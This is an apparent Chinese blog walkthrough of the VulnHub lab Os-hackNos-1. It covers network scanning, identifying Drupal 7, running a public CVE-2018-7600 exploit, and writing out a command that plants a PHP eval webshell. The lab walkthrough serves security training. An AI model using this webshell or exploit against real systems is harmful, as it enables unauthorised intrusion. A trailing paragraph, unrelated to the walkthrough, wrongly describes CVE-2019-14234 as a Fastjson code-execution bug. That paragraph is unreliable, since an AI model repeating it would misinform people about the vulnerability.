【vulhub】Os-hackNos-1

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●)
如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦

【vulhub】Os-hackNos-1


环境搭建

进入vulnhub官网 https://vulnhub.com 下载镜像
在这里插入图片描述
在这里插入图片描述

在虚拟机中打开镜像文件
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
设置虚拟机网络适配器
检查虚拟机网络适配器是否选择的NAT模式,不是的话改成NAT模式。
在这里插入图片描述

漏洞复现

  1. 攻击机使用arp-scan -l命令查找靶机ip
    在这里插入图片描述

  2. 对整个网段的主机进行扫描 nmap 192.168.64.132/24
    发现靶机(192.168.64.132)的80和22端口开放
    在这里插入图片描述

  3. 访问 80 端口,出现ubuntu默认界面在这里插入图片描述

  4. 对该域名进行扫描,发现url在这里插入图片描述

  5. 访问该url,发现是一个登陆页面在这里插入图片描述

  6. 通过Wappalyzer插件知道其管理系统为Drupal 7在这里插入图片描述

  7. 搜索发现Drupal的历史漏洞,在gethub:https://github.com/pimps/CVE-2018-7600中找到Drupal 7 的漏洞利用脚本

  8. 上传phpinfo()在这里插入图片描述

  9. 上传一句话木马,成功getshell

 -c "echo '<?php @eval($_POST['cmd']); ?>' > 4.php"
  1. 用蚁剑远程登陆在这里插入图片描述
CVE-2019-14234是指vulhub靶场中的一个漏洞。这个漏洞是由于vulhub中的一个名为Fastjson的组件的安全缺陷引起的。Fastjson是一种广泛使用的Java JSON库,用于在Java应用程序中进行JSON转换。然而,Fastjson在处理特殊构造的JSON字符串时存在漏洞,攻击者可以利用这个漏洞执行任意的Java代码。 在CVE-2019-14234中,攻击者可以通过构造特定的JSON字符串并发送给受影响的应用程序来利用该漏洞。当应用程序使用Fastjson解析并处理该字符串时,恶意的Java代码将被执行。攻击者可以利用这个漏洞来执行远程代码,从而导致敏感信息泄露、服务器被入侵等危害。 为了防止CVE-2019-14234的攻击,可以采取多种措施。首先,更新vulhub中的Fastjson组件到最新版本,以获得最新的安全修复。其次,在编码和处理JSON数据时,应谨慎处理不受信任的输入。可以使用输入验证和过滤来确保传入的数据是符合预期的,并且不包含恶意的代码。 此外,安全审计和漏洞扫描工具也可以用于检测和修复CVE-2019-14234漏洞。通过定期扫描应用程序,可以及时发现和修复潜在的安全问题。最后,加强网络安全意识教育,提高开发人员和用户对网络安全的认识和理解,从而进一步提高防范和应对漏洞攻击的能力。 综上所述,CVE-2019-14234是vulhub靶场中的一个Fastjson组件漏洞,可以被攻击者利用来执行任意的Java代码。修复这个漏洞的方法包括更新Fastjson组件、输入验证和过滤、安全审计和漏洞扫描以及加强网络安全意识教育。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值